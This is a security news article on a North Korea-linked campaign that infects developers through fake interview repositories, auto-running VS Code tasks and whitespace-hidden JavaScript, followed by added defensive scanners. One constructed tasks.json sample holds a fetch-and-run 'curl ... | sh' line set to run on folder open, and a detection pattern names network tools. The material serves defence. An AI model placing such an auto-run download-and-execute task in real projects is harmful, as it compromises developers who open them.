CyberSecurityNews

Void Dokkaebi Hackers Use Fake Job Interviews to Spread Malware via Code Repositories


A North Korea-linked hacking group known as Void Dokkaebi, also tracked as Famous Chollima, is running a campaign that tricks software developers into installing malware through fake job interviews.

The group lures developers into cloning infected code repositories as part of a fabricated coding test, then turns their machines and projects into malware-spreading tools.

The attack starts with a convincing setup. Threat actors pose as recruiters from cryptocurrency and artificial intelligence firms, reaching out to developers on professional platforms.

During a fake interview, the target is asked to clone a repository on GitHub, GitLab, or Bitbucket and run it as a “technical assessment.”

These repositories look like legitimate projects but carry hidden malicious code that runs the moment the developer opens the folder.

What makes this campaign dangerous is what happens after that first infection. Trend Micro analysts identified that Void Dokkaebi does not stop at a single compromised developer.


The attacker uses the victim’s own machine and repositories to infect the next wave of developers, creating a worm-like chain that spreads across organizations without further social engineering.

By March 2026, the scale had grown significantly. Analysis by Trend Micro Research identified more than 750 infected repositories, over 500 malicious VS Code task configurations, and 101 instances of a commit tampering tool across public code hosting platforms.

Repositories belonging to organizations such as DataStax and Neutralinojs were also found carrying infection markers, showing the campaign had reached into popular open-source projects.

Once a compromised developer pushes code to GitHub or reuses components elsewhere, the malicious files travel with it, waiting for the next developer to open the project and trigger the attack, creating a cycle that grows with every commit.

Inside the Infection Chain

The campaign uses two methods working together. The first abuses Visual Studio Code workspace files, specifically .vscode/tasks.json, a task definition inside the repository's .vscode directory that is configured to run a task automatically when the developer opens the project folder.

When the developer accepts the workspace trust prompt, the malicious task executes without further interaction, fetching a backdoor from a remote URL or launching a disguised file inside the repository carrying the payload.
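The following scanner, added here as an example and not part of Trend Micro's tooling, shows what the auto-run abuse looks like in the tasks.json schema and how to flag it across a checkout. It relies on the documented VS Code setting runOptions.runOn = "folderOpen", which is what makes a task start once the folder is opened and workspace trust is granted; the sample tasks.json, the placeholder URL example.invalid and the list of suspicious command patterns are constructed for the demonstration.

```python
"""Flag VS Code tasks that auto-run on folder open.

Added example (not Trend Micro's tooling). Assumes .vscode/tasks.json follows
the documented VS Code schema, where runOptions.runOn = "folderOpen" makes a
task start when the folder is opened and workspace trust is granted.
"""
import json
import re
from pathlib import Path

# Heuristic: an auto-run task that reaches out to the network or spawns an
# interpreter matches the shape described in the report. Constructed list.
SUSPICIOUS_CMD = re.compile(
    r"(curl|wget|Invoke-WebRequest|\biwr\b|powershell|node\s+-e|sh\s+-c|bash\s+-c|https?://)",
    re.IGNORECASE,
)


def strip_jsonc(text: str) -> str:
    """Best-effort removal of comments and trailing commas (tasks.json is JSONC)."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    return re.sub(r",(\s*[}\]])", r"\1", text)


def task_command_text(task: dict) -> str:
    """Join command and args, including per-OS overrides, into one string."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    for os_key in ("windows", "linux", "osx"):
        sub = task.get(os_key) or {}
        parts.append(str(sub.get("command", "")))
        parts += [str(a) for a in sub.get("args", [])]
    return " ".join(p for p in parts if p)


def find_autorun_tasks(tasks_json_text: str) -> list:
    """Return (label, command, reasons) for every task with runOn=folderOpen."""
    data = json.loads(strip_jsonc(tasks_json_text))
    findings = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = task_command_text(task)
        reasons = ["runOptions.runOn=folderOpen"]
        if SUSPICIOUS_CMD.search(cmd):
            reasons.append("fetches or executes remote content")
        if task.get("hide") or (task.get("presentation") or {}).get("reveal") == "silent":
            reasons.append("hidden/silent presentation")
        findings.append((task.get("label", "<unlabeled>"), cmd, reasons))
    return findings


def scan_checkout(root) -> dict:
    """Map every .vscode/tasks.json under root to its auto-run findings."""
    results = {}
    for path in Path(root).rglob("tasks.json"):
        if path.parent.name != ".vscode":
            continue
        try:
            results[str(path)] = find_autorun_tasks(path.read_text(encoding="utf-8"))
        except (OSError, ValueError) as exc:  # JSONDecodeError/UnicodeDecodeError are ValueErrors
            results[str(path)] = [("<unparseable>", str(exc), ["could not parse"])]
    return results


# Constructed sample mirroring the pattern described above; not a real artifact.
SAMPLE_TASKS_JSON = r"""{
  // constructed sample
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {
      "label": "prepare",
      "type": "shell",
      "command": "sh",
      "args": ["-c", "curl -fsSL https://example.invalid/setup.sh | sh"],
      "runOptions": {"runOn": "folderOpen"},
      "presentation": {"reveal": "silent"},
    }
  ]
}"""

if __name__ == "__main__":
    for label, cmd, reasons in find_autorun_tasks(SAMPLE_TASKS_JSON):
        print(f"[!] task {label!r}: {cmd} -> {', '.join(reasons)}")
```

Run scan_checkout() against a freshly cloned interview repository before opening it in the editor; the ordinary "build" task is ignored, while the "prepare" task is reported with all three reasons. Because tasks.json is JSONC, the comment and the trailing comma in the sample are tolerated, which matters since a strict JSON parser would otherwise silently skip exactly the file you want to inspect.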

Infection paths used by Void Dokkaebi (Source – Trend Micro)

The second method is more direct. After gaining remote access to a developer’s machine, obfuscated JavaScript is injected into source files in the victim’s own repositories.

The injected code is pushed far to the right of the line with long runs of whitespace, so it sits off-screen and goes unnoticed during quick reviews.

A batch script called temp_auto_push.bat rewrites the git commit history, copying the original author name, timestamp, and message before force-pushing the tampered version so that it appears to be a legitimate commit.
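Both indicators from the two paragraphs above can be checked for mechanically. The scanner below is an added example, not Trend Micro's tooling: it looks for source lines where visible code is followed by a long run of spaces or tabs and then more code (the whitespace-hiding trick), and it reports any file named temp_auto_push.bat. The gap threshold, the file-extension list and the sample Express file are constructed assumptions; the stand-in tail contains no real payload.

```python
"""Find source lines whose tail is hidden behind a long run of whitespace.

Added example (not Trend Micro's tooling). Assumes only what the report
states: visible code, then a gap of whitespace, then more code pushed past
the right edge of the editor. The tamper-tool filename comes from the report.
"""
import re
from pathlib import Path

GAP = 40  # spaces/tabs between visible code and hidden tail; tune per code style
SOURCE_SUFFIXES = {".js", ".mjs", ".cjs", ".jsx", ".ts", ".tsx"}  # constructed list
TAMPER_TOOL = "temp_auto_push.bat"  # named in the report


def find_hidden_tails(text: str, gap: int = GAP) -> list:
    """Return (lineno, visible_prefix, hidden_tail) for each suspicious line."""
    pattern = re.compile(r"^(.*?\S)[ \t]{%d,}(\S.*)$" % gap)
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = pattern.match(line)
        if match:
            hits.append((lineno, match.group(1), match.group(2)))
    return hits


def scan_checkout(root, gap: int = GAP) -> dict:
    """Scan a checkout; returns {"hidden": {path: hits}, "tamper_tool": [paths]}."""
    report = {"hidden": {}, "tamper_tool": []}
    for path in Path(root).rglob("*"):
        if not path.is_file() or ".git" in path.parts:
            continue
        if path.name.lower() == TAMPER_TOOL:
            report["tamper_tool"].append(str(path))
        if path.suffix.lower() in SOURCE_SUFFIXES:
            try:
                text = path.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue
            hits = find_hidden_tails(text, gap)
            if hits:
                report["hidden"][str(path)] = hits
    return report


# Constructed sample: an ordinary Express file with a tail appended to line 3.
SAMPLE_SOURCE = (
    "const express = require('express');\n"
    "const app = express();\n"
    "app.get('/', (req, res) => res.send('ok'));"
    + " " * 300
    + "(function(){ /* stand-in for an obfuscated blob */ })();\n"
    "app.listen(3000);   // aligned comment, short gap, must not fire\n"
)

if __name__ == "__main__":
    for lineno, prefix, tail in find_hidden_tails(SAMPLE_SOURCE):
        print(f"line {lineno}: {prefix[:40]!r} ... hidden: {tail[:60]!r}")
```

A column-aligned comment a few spaces after the code does not trigger the check; only line 3 of the sample, with its 300-space gap, is reported. Run it over a repository from the command line with scan_checkout("."), and pair it with a review of git log --show-signature, since the report's commit-tampering tool preserves author, timestamp and message, so the history itself will look ordinary and only the signature (or its absence) gives it away.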

Code snippets of a GitHub repository containing the injected code (Source – Trend Micro)

The delivered payload is a variant of the DEVSPOPPER remote access trojan, a cross-platform Node.js-based tool. It connects to a command-and-control server via WebSocket and uses HTTP for file exfiltration.

A multi-operator session system lets several threat actors work on one compromised machine at the same time.

The RAT detects and avoids CI/CD environments and cloud sandboxes, running only on real developer workstations, so automated pipeline scanning will miss it.

Developers and organizations can take steps to reduce exposure. Always run interview code in isolated or disposable virtual environments destroyed after the session, and never execute it on personal or production machines.

Add .vscode/ to .gitignore and enforce this across all organizational repositories to block passive worm propagation. Require GPG- or SSH-signed commits with branch protection and mandatory pull requests to stop the commit-tampering tool.

Audit source code for infection markers global!′!′ and global’_V’, and check for temp_auto_push.bat.

Monitor outbound connections to blockchain API endpoints such as api.trongrid.io and Binance Smart Chain RPC endpoints from developer workstations.
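One way to turn that monitoring advice into a check, added here as an example rather than anything from Trend Micro or the report: parse egress log lines and flag developer-workstation sources that reach the watched endpoints. The log format, the 10.20.0.0/16 developer VLAN and the sample lines are constructed; api.trongrid.io is the endpoint the report names, and bsc-dataseed.binance.org is one public BSC RPC host used as a stand-in for the "Binance Smart Chain RPC endpoints" the report refers to without naming.

```python
"""Flag developer-workstation egress to blockchain API endpoints.

Added example (not Trend Micro's tooling). Log format, the developer VLAN and
the sample lines are constructed. api.trongrid.io comes from the report;
bsc-dataseed.binance.org is one public BSC RPC host standing in for the
unnamed "Binance Smart Chain RPC endpoints".
"""
import ipaddress
import re
from collections import defaultdict

WATCHED_HOSTS = {"api.trongrid.io", "bsc-dataseed.binance.org"}
DEV_NETS = [ipaddress.ip_network("10.20.0.0/16")]  # constructed developer VLAN
LINE = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+dport=(?P<port>\d+)\s+bytes=(?P<bytes>\d+)$"
)


def parse_line(line: str):
    """Parse one constructed egress log line; return a dict or None if malformed."""
    match = LINE.match(line.strip())
    if not match:
        return None
    rec = match.groupdict()
    rec["port"] = int(rec["port"])
    rec["bytes"] = int(rec["bytes"])
    return rec


def is_dev_workstation(ip: str) -> bool:
    """True when the source address falls inside a developer network."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in DEV_NETS)


def flag_blockchain_egress(lines) -> dict:
    """Return {src_ip: [(ts, dst, bytes), ...]} for dev hosts reaching watched endpoints."""
    findings = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        dst = rec["dst"].lower().rstrip(".")
        if dst in WATCHED_HOSTS and is_dev_workstation(rec["src"]):
            findings[rec["src"]].append((rec["ts"], dst, rec["bytes"]))
    return dict(findings)


# Constructed sample log: one developer host, one server host, one bad line.
SAMPLE_LOG = """\
2026-03-12T10:15:02Z src=10.20.5.17 dst=github.com dport=443 bytes=9120
2026-03-12T10:15:09Z src=10.20.5.17 dst=api.trongrid.io dport=443 bytes=1842
2026-03-12T10:16:44Z src=10.50.1.2 dst=api.trongrid.io dport=443 bytes=2210
2026-03-12T10:17:01Z src=10.20.5.17 dst=bsc-dataseed.binance.org dport=443 bytes=1530
garbage line that the parser must skip
"""

if __name__ == "__main__":
    for src, events in flag_blockchain_egress(SAMPLE_LOG.splitlines()).items():
        print(src, "->", ", ".join(f"{dst} at {ts}" for ts, dst, _ in events))
```

The server at 10.50.1.2 is deliberately left unflagged: a payments or analytics host may have a legitimate reason to query a blockchain API, whereas the same destination from a developer laptop is the anomaly the advice above points at. Feed the function a tail of your proxy or firewall export and alert on any non-empty result.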

Endpoint-level detection on developer workstations is essential since the RAT avoids CI/CD environments by design.
